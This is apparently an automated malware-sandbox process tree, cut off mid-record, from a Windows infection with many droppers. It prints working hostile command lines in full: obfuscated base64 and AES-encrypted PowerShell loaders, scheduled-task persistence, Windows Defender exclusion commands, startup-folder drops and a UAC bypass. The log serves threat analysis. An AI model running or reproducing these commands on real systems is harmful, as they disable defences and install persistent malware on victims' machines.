C:\Windows\SYSTEM32\cmd.exe"cmd" /c copy "C:\Users\Admin\AppData\Local\Temp\a\diufhloadme.exe" "C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe"3⤵PID:1104
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\ghhjhjhsg.exe"C:\Users\Admin\AppData\Local\Temp\a\ghhjhjhsg.exe"2⤵
- Executes dropped EXE
PID:4140 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "hgfhjjhgj" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\ghghghfg\gfhgfgjgf.exe" /rl HIGHEST /f3⤵
- DcRat
- Creates scheduled task(s)
PID:1552
-
-
C:\Users\Admin\AppData\Roaming\ghghghfg\gfhgfgjgf.exe"C:\Users\Admin\AppData\Roaming\ghghghfg\gfhgfgjgf.exe"3⤵
- Executes dropped EXE
PID:3508 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "hgfhjjhgj" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\ghghghfg\gfhgfgjgf.exe" /rl HIGHEST /f4⤵
- DcRat
- Creates scheduled task(s)
PID:3504
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\crypt.exe"C:\Users\Admin\AppData\Local\Temp\a\crypt.exe"2⤵
- Executes dropped EXE
PID:1440 -
C:\Windows\SysWOW64\wscript.exe"wscript.exe" "C:\Users\Admin\start.vbs"3⤵PID:4408
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\temp.bat" "4⤵PID:1552
-
C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gRGVjb21wcmVzc0J5dGVzKCRjb21wcmVzc2VkRGF0YSkgeyAkbXMgPSBbSU8uTWVtb3J5U3RyZWFtXTo6bmV3KChbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRjb21wcmVzc2VkRGF0YSkpKTsgJG1zLlBvc2l0aW9uID0gMDsgJGRlZmxhdGVTdHJlYW0gPSBbSU8uQ29tcHJlc3Npb24uRGVmbGF0ZVN0cmVhbV06Om5ldygkbXMsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsgJGJ1ZmZlciA9IFtieXRlW11dOjpuZXcoNDA5Nik7ICRtcyA9IFtJTy5NZW1vcnlTdHJlYW1dOjpuZXcoKTsgd2hpbGUgKCR0cnVlKSB7ICRjb3VudCA9ICRkZWZsYXRlU3RyZWFtLlJlYWQoJGJ1ZmZlciwgMCwgJGJ1ZmZlci5MZW5ndGgpOyBpZiAoJGNvdW50IC1lcSAwKSB7IGJyZWFrIH0gJG1zLldyaXRlKCRidWZmZXIsIDAsICRjb3VudCkgfSAkZGVmbGF0ZVN0cmVhbS5DbG9zZSgpOyAkbXMuVG9BcnJheSgpIH0NCg0KZnVuY3Rpb24gUmV2ZXJzZVN0cmluZygkaW5wdXRTdHJpbmcpIHsNCiAgICAkY2hhckFycmF5ID0gJGlucHV0U3RyaW5nLlRvQ2hhckFycmF5KCkgICMgQ29udmVydCBzdHJpbmcgdG8gY2hhcmFjdGVyIGFycmF5DQogICAgJHJldmVyc2VkQXJyYXkgPSAkY2hhckFycmF5Wy0xLi4tKCRjaGFyQXJyYXkuTGVuZ3RoKV0gICMgUmV2ZXJzZSB0aGUgYXJyYXkNCiAgICAkcmV2ZXJzZWRTdHJpbmcgPSAtam9pbiAkcmV2ZXJzZWRBcnJheSAgIyBDb252ZXJ0IHRoZSByZXZlcnNlZCBhcnJheSBiYWNrIHRvIGEgc3RyaW5nDQogICAgcmV0dXJuICRyZXZlcnNlZFN0cmluZw0KfQ0KDQpmdW5jdGlvbiBDbG9zZS1Qcm9jZXNzIHsNCiAgICBwYXJhbSgNCiAgICAgICAgW3N0cmluZ10kUHJvY2Vzc05hbWUNCiAgICApDQoNCiAgICAkcHJvY2VzcyA9IEdldC1Qcm9jZXNzIC1OYW1lICRQcm9jZXNzTmFtZSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZQ0KDQogICAgaWYgKCRwcm9jZXNzIC1uZSAkbnVsbCkgew0KICAgICAgICBTdG9wLVByb2Nlc3MgLU5hbWUgJFByb2Nlc3NOYW1lIC1Gb3JjZQ0KCX0NCn0NCg0KZnVuY3Rpb24gQ29udmVydC1Bc2NpaVRvU3RyaW5nKCRhc2NpaUFycmF5KXsNCiRvZmZTZXRJbnRlZ2VyPTEyMzsNCiRkZWNvZGVkU3RyaW5nPSROdWxsOw0KZm9yZWFjaCgkYXNjaWlJbnRlZ2VyIGluICRhc2NpaUFycmF5KXskZGVjb2RlZFN0cmluZys9W2NoYXJdKCRhc2NpaUludGVnZXItJG9mZlNldEludGVnZXIpfTsNCnJldHVybiAkZGVjb2RlZFN0cmluZ307DQoNCg0KDQokZW5jb2RlZEFycmF5ID0gQCgxNTksMjIwLDIzOCwyMzgsMjI0LDIzMiwyMjEsMjMxLDI0NCwxNjksMTkyLDIzMywyMzksMjM3LDI0NCwyMDMsMjM0LDIyOCwyMzMsMjM5LDE2OSwxOTYsMjMzLDI0MSwyMzQsMjMwLDIyNCwxNjMsMTU5LDIzMywyNDAsMjMxLDIzMSwxNjcsMTU5LDIzMywyNDAsMjMxLDIzMSwxNjQsMTgyKQ0KJGRlY29kZWRTdHJpbmcgPSBDb252ZXJ0LUFzY2lpVG9TdHJpbmcgJGVuY29kZWRBcnJheQ0KDQoNCiRmaWxlUGF0aCA9IEpvaW4tUGF0aCAkZW52OlVzZXJQcm9maWxlICJleHBsb3Jlci5iYXQiDQokbGFzdExpbmUgPSBHZXQtQ29udGVudCAtUGF0aCAkZmlsZVBhdGggfCBTZWxlY3QtT2JqZWN0IC1MYXN0IDENCiRjbGVhbmVkTGluZSA9ICRsYXN0TGluZSAtcmVwbGFjZSAnXjo6Jw0KJHJldmVyc2UgPSBSZXZlcnNlU3RyaW5nICRjbGVhbmVkTGluZQ0KJGRlY29tcHJlc3NlZEJ5dGUgPSBEZWNvbXByZXNzQnl0ZXMgLWNvbXByZXNzZWREYXRhICRyZXZlcnNlDQoNCiRhc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW2J5dGVbXV0kZGVjb21wcmVzc2VkQnl0ZSkNCg0KJGFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChbYnl0ZVtdXSRkZWNvbXByZXNzZWRCeXRlKQ0KDQpJbnZva2UtRXhwcmVzc2lvbiAkZGVjb2RlZFN0cmluZw0KDQpDbG9zZS1Qcm9jZXNzIC1Qcm9jZXNzTmFtZSAiY21kIg==')) | Out-File -FilePath 'C:\Users\Admin\explorer.ps1' -Encoding UTF8"5⤵PID:4692
-
-
C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\explorer.ps1"5⤵
- Drops startup file
- Suspicious use of SetThreadContext
PID:1700 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"6⤵PID:6020
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\Opera_109.0.5097.38_Autoupdate_x64.exe"C:\Users\Admin\AppData\Local\Temp\a\Opera_109.0.5097.38_Autoupdate_x64.exe"2⤵
- Executes dropped EXE
PID:432
-
-
C:\Users\Admin\AppData\Local\Temp\a\toolspub1.exe"C:\Users\Admin\AppData\Local\Temp\a\toolspub1.exe"2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
PID:5980
-
-
C:\Users\Admin\AppData\Local\Temp\a\crypted_69a30000.exe"C:\Users\Admin\AppData\Local\Temp\a\crypted_69a30000.exe"2⤵
- Suspicious use of SetThreadContext
PID:6060 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:5144
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\Pgp-Soft.exe"C:\Users\Admin\AppData\Local\Temp\a\Pgp-Soft.exe"2⤵PID:6004
-
C:\Users\Admin\AppData\Local\Temp\ckz_PLJG\nds.exe"C:\Users\Admin\AppData\Local\Temp\ckz_PLJG\nds.exe"3⤵PID:6112
-
C:\Users\Admin\AppData\Local\Temp\ckz_PLJG\nds.exe"C:\Users\Admin\AppData\Local\Temp\ckz_PLJG\nds.exe"4⤵
- Modifies WinLogon for persistence
- Loads dropped DLL
PID:5380 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill.exe /F /IM nvidia.exe5⤵PID:5420
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill.exe /F /IM mmi.exe5⤵PID:5332
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill.exe /F /IM arm.exe5⤵PID:3164
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill.exe /F /IM mnn.exe5⤵PID:5688
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill.exe /F /IM mme.exe5⤵PID:5356
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill.exe /F /IM nnu.exe5⤵PID:1700
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill.exe /F /IM lss.exe5⤵PID:6008
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill.exe /F /IM onn.exe5⤵PID:5960
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill.exe /F /IM u-eng.exe5⤵PID:408
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\temp\java.exe" x -o+ -p8ay73yG6s6gHu8H "C:\Users\Admin\AppData\Local\temp\data6." "C:\ProgramData""5⤵PID:5668
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\temp\java.exe x -o+ -p8ay73yG6s6gHu8H C:\Users\Admin\AppData\Local\temp\data5. C:\Users\Admin\AppData\Roaming\\"5⤵PID:5948
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\temp\java.exe x -o+ -p8ay73yG6s6gHu8H C:\Users\Admin\AppData\Local\temp\data4. C:\Users\Admin\AppData\Roaming\\"5⤵PID:5644
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\temp\java.exe x -o+ -p8ay73yG6s6gHu8H C:\Users\Admin\AppData\Local\temp\data3. C:\Users\Admin\AppData\Local\\"5⤵PID:5588
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c ""%USERPROFILE%\AppData\Roaming\Alexa\Virtual\hostcls.exe"5⤵PID:1700
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /C "C:\Windows\explorer.exe "%APPDATA%\Fsdisk\Moderax\svdhost.exe""5⤵PID:7084
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c C:\Users\Admin\AppData\Roaming\Chrome\Data01\Ibszab.bat5⤵PID:7080
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c C:\Users\Admin\AppData\Roaming\Chrome\Data01\Ibszab.exe5⤵PID:6780
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c C:\ProgramData\Samsung\svdhost.exe5⤵PID:3288
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c ""%USERPROFILE%\AppData\Local\Temp\Googletemp1\wsx.bat"5⤵PID:7088
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill.exe /F /IM nss.exe5⤵PID:6600
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "explorer C:\Users\Admin\AppData\Roaming\Chrome\Sharp\Vchtrgchhg.bat"5⤵PID:6408
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\garits.exe"C:\Users\Admin\AppData\Local\Temp\a\garits.exe"2⤵
- UAC bypass
- System policy modification
PID:5644 -
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe"Powershell.exe" -exec bypass -c Copy-Item 'C:\Users\Admin\AppData\Local\Temp\a\garits.exe' 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\garits.exe' -Force3⤵
- Drops startup file
PID:6016
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\current.exe"C:\Users\Admin\AppData\Local\Temp\a\current.exe"2⤵PID:5532
-
-
C:\Users\Admin\AppData\Local\Temp\a\test.exe"C:\Users\Admin\AppData\Local\Temp\a\test.exe"2⤵PID:6108
-
-
C:\Users\Admin\AppData\Local\Temp\a\123.exe"C:\Users\Admin\AppData\Local\Temp\a\123.exe"2⤵PID:3984
-
-
C:\Users\Admin\AppData\Local\Temp\a\sarra.exe"C:\Users\Admin\AppData\Local\Temp\a\sarra.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5732
-
-
C:\Users\Admin\AppData\Local\Temp\a\JSIDBWSJK.exe"C:\Users\Admin\AppData\Local\Temp\a\JSIDBWSJK.exe"2⤵PID:5192
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp86B1.tmp.bat" "3⤵PID:5436
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\tmp86B1.tmp.bat"4⤵PID:5568
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\tmp86B1.tmp.bat';$IKhK='MahibHihibHnhibHModhibHulhibHehibH'.Replace('hibH', ''),'GetQgnnCuQgnnrrQgnneQgnnntPQgnnroQgnnceQgnnsQgnnsQgnn'.Replace('Qgnn', ''),'EleVKaqmVKaqeVKaqntVKaqAtVKaq'.Replace('VKaq', ''),'ReaXrSRdLiXrSRnXrSResXrSR'.Replace('XrSR', ''),'DeDwcdcDwcdomDwcdpDwcdreDwcdsDwcdsDwcd'.Replace('Dwcd', ''),'CVrqZreaVrqZtVrqZeVrqZDVrqZecVrqZryVrqZptoVrqZrVrqZ'.Replace('VrqZ', ''),'ChXNvfaXNvfnXNvfgXNvfeEXNvfxteXNvfnsXNvfiXNvfonXNvf'.Replace('XNvf', ''),'SpHdEMlitHdEM'.Replace('HdEM', ''),'EnFMIKtFMIKryFMIKPFMIKoiFMIKntFMIK'.Replace('FMIK', ''),'CCPxDopCPxDyCPxDToCPxD'.Replace('CPxD', ''),'InLeisvLeisokLeiseLeis'.Replace('Leis', ''),'TzEulranzEulszEulfzEulorzEulmzEulFzEulinzEulazEullBzEullozEulckzEul'.Replace('zEul', ''),'LMYvEoMYvEaMYvEdMYvE'.Replace('MYvE', ''),'FrgPovomgPovBgPovagPovsgPove64gPovStgPovrgPovigPovnggPov'.Replace('gPov', '');powershell -w hidden;function Wjvpz($DSMeA){$LRUPP=[System.Security.Cryptography.Aes]::Create();$LRUPP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$LRUPP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$LRUPP.Key=[System.Convert]::($IKhK[13])('hbO8R88HBl6x9E1ChjrqAUcnoAC3B8p99JSIvXSwQuY=');$LRUPP.IV=[System.Convert]::($IKhK[13])('5zVFVvVJKQyl6Cns03Obiw==');$folEv=$LRUPP.($IKhK[5])();$SLWGx=$folEv.($IKhK[11])($DSMeA,0,$DSMeA.Length);$folEv.Dispose();$LRUPP.Dispose();$SLWGx;}function TImJD($DSMeA){$gpnDG=New-Object System.IO.MemoryStream(,$DSMeA);$hLGlZ=New-Object System.IO.MemoryStream;$KsXZc=New-Object System.IO.Compression.GZipStream($gpnDG,[IO.Compression.CompressionMode]::($IKhK[4]));$KsXZc.($IKhK[9])($hLGlZ);$KsXZc.Dispose();$gpnDG.Dispose();$hLGlZ.Dispose();$hLGlZ.ToArray();}$Ewgsd=[System.IO.File]::($IKhK[3])([Console]::Title);$WuYWe=TImJD (Wjvpz ([Convert]::($IKhK[13])([System.Linq.Enumerable]::($IKhK[2])($Ewgsd, 5).Substring(2))));$NZPxf=TImJD (Wjvpz ([Convert]::($IKhK[13])([System.Linq.Enumerable]::($IKhK[2])($Ewgsd, 6).Substring(2))));[System.Reflection.Assembly]::($IKhK[12])([byte[]]$NZPxf).($IKhK[8]).($IKhK[10])($null,$null);[System.Reflection.Assembly]::($IKhK[12])([byte[]]$WuYWe).($IKhK[8]).($IKhK[10])($null,$null); "5⤵PID:5076
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe5⤵PID:4760
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden6⤵PID:2452
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\tmp86B1.tmp')6⤵PID:688
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 36344' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Network36344Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force6⤵PID:5248
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Roaming\Network36344Man.cmd"6⤵PID:2452
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\Locker.exe"C:\Users\Admin\AppData\Local\Temp\a\Locker.exe"2⤵PID:5484
-
-
C:\Users\Admin\AppData\Local\Temp\a\eeee.exe"C:\Users\Admin\AppData\Local\Temp\a\eeee.exe"2⤵PID:5312
-
-
C:\Users\Admin\AppData\Local\Temp\a\inte.exe"C:\Users\Admin\AppData\Local\Temp\a\inte.exe"2⤵PID:5180
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "inte.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\a\inte.exe" & exit3⤵PID:5252
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "inte.exe" /f4⤵
- Kills process with taskkill
PID:5040
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\XClient.exe"C:\Users\Admin\AppData\Local\Temp\a\XClient.exe"2⤵PID:4628
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\XClient.exe'3⤵PID:5220
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'3⤵PID:1660
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\WindowsHealthSystem.exe'3⤵PID:6060
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'WindowsHealthSystem.exe'3⤵PID:1916
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "WindowsHealthSystem" /tr "C:\Users\Admin\AppData\Local\WindowsHealthSystem.exe"3⤵
- DcRat
- Creates scheduled task(s)
PID:4772
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\hghgfhjfhmain.exe"C:\Users\Admin\AppData\Local\Temp\a\hghgfhjfhmain.exe"2⤵PID:5848
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "fgfdhdgg" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\gfgfgf\gfdgfdg.exe" /rl HIGHEST /f3⤵
- DcRat
- Creates scheduled task(s)
PID:5532
-
-
C:\Users\Admin\AppData\Roaming\gfgfgf\gfdgfdg.exe"C:\Users\Admin\AppData\Roaming\gfgfgf\gfdgfdg.exe"3⤵PID:5756
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "fgfdhdgg" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\gfgfgf\gfdgfdg.exe" /rl HIGHEST /f4⤵
- DcRat
- Creates scheduled task(s)
PID:5580
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\swiiiii.exe"C:\Users\Admin\AppData\Local\Temp\a\swiiiii.exe"2⤵PID:1368
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:5180
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\Akh.exe"C:\Users\Admin\AppData\Local\Temp\a\Akh.exe"2⤵PID:5356
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile3⤵PID:5860
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"3⤵PID:5680
-
C:\Users\Admin\Pictures\BgPVpErLGlIE9QAbpfBhXOoq.exe"C:\Users\Admin\Pictures\BgPVpErLGlIE9QAbpfBhXOoq.exe"4⤵PID:5232
-
C:\Users\Admin\AppData\Local\Temp\u41c.0.exe"C:\Users\Admin\AppData\Local\Temp\u41c.0.exe"5⤵PID:5768
-
-
C:\Users\Admin\AppData\Local\Temp\u41c.1.exe"C:\Users\Admin\AppData\Local\Temp\u41c.1.exe"5⤵PID:6040
-
-
-
C:\Users\Admin\Pictures\7xiGPhPAcXcpxlmhCVjpStPR.exe"C:\Users\Admin\Pictures\7xiGPhPAcXcpxlmhCVjpStPR.exe"4⤵PID:5952
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵PID:2400
-
-
-
C:\Users\Admin\Pictures\eYxaaLxmsEV6X67zIYyc26mU.exe"C:\Users\Admin\Pictures\eYxaaLxmsEV6X67zIYyc26mU.exe"4⤵PID:4772
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵PID:4104
-
-
-
C:\Users\Admin\Pictures\lb8EuIIsMPyHcTpWPfBL8aX0.exe"C:\Users\Admin\Pictures\lb8EuIIsMPyHcTpWPfBL8aX0.exe"4⤵PID:5676
-
C:\Users\Admin\AppData\Local\Temp\7zS3C74.tmp\Install.exe.\Install.exe /mhUxhdidmTTqC "385118" /S5⤵PID:5420
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"6⤵PID:5980
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵PID:4204
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bgNHpsssZstYPMxCCI" /SC once /ST 14:10:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\GsQRrtwSziAnYplPc\CShgmbCUeIuNzVH\BfaKQmM.exe\" mP /PUsite_idbKq 385118 /S" /V1 /F6⤵
- DcRat
- Creates scheduled task(s)
PID:5248
-
-
-
-
C:\Users\Admin\Pictures\tY1jQnDDJbXghoEY1z4Pk8xI.exe"C:\Users\Admin\Pictures\tY1jQnDDJbXghoEY1z4Pk8xI.exe" --silent --allusers=04⤵PID:4336
-
C:\Users\Admin\Pictures\tY1jQnDDJbXghoEY1z4Pk8xI.exeC:\Users\Admin\Pictures\tY1jQnDDJbXghoEY1z4Pk8xI.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.38 --initial-client-data=0x2a0,0x2a4,0x2a8,0x250,0x2ac,0x6962e1d0,0x6962e1dc,0x6962e1e85⤵PID:5468
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\tY1jQnDDJbXghoEY1z4Pk8xI.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\tY1jQnDDJbXghoEY1z4Pk8xI.exe" --version5⤵PID:5948
-
-
C:\Users\Admin\Pictures\tY1jQnDDJbXghoEY1z4Pk8xI.exe"C:\Users\Admin\Pictures\tY1jQnDDJbXghoEY1z4Pk8xI.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=4336 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240409140915" --session-guid=7de74adb-7aff-431b-bfc1-50b01a0ca7b1 --server-tracking-blob=OTU4NDg1YjdiNDBiNWMwNGQ1NThmOWYzZDYzN2E4OTBiZWM0ZTdlYzFjMzM2ZjQwYzJiMjk3MDY2MThjZTI3Njp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2N183ODkiLCJzeXN0ZW0iOnsicGxhdGZvcm0iOnsiYXJjaCI6Ing4Nl82NCIsIm9wc3lzIjoiV2luZG93cyIsIm9wc3lzLXZlcnNpb24iOiIxMCIsInBhY2thZ2UiOiJFWEUifX0sInRpbWVzdGFtcCI6IjE3MTI2NzE3MzMuMDI2MyIsInV0bSI6eyJjYW1wYWlnbiI6Ijc2N183ODkiLCJtZWRpdW0iOiJhcGIiLCJzb3VyY2UiOiJta3QifSwidXVpZCI6ImU3NjYzYjY0LTYzNzgtNDQ4ZS04N2E1LTM5MjI3NTRkMDNhYSJ9 --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=54040000000000005⤵PID:5284
-
C:\Users\Admin\Pictures\tY1jQnDDJbXghoEY1z4Pk8xI.exeC:\Users\Admin\Pictures\tY1jQnDDJbXghoEY1z4Pk8xI.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.38 --initial-client-data=0x2b8,0x2bc,0x2c0,0x294,0x2c4,0x68cae1d0,0x68cae1dc,0x68cae1e86⤵PID:5132
-
-
-
-
C:\Users\Admin\Pictures\5cLbSaUQb8ntnFFKq2JYAKUM.exe"C:\Users\Admin\Pictures\5cLbSaUQb8ntnFFKq2JYAKUM.exe"4⤵PID:5920
-
C:\Users\Admin\AppData\Local\Temp\7zS5897.tmp\Install.exe.\Install.exe /mhUxhdidmTTqC "385118" /S5⤵PID:6168
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"6⤵PID:7160
-
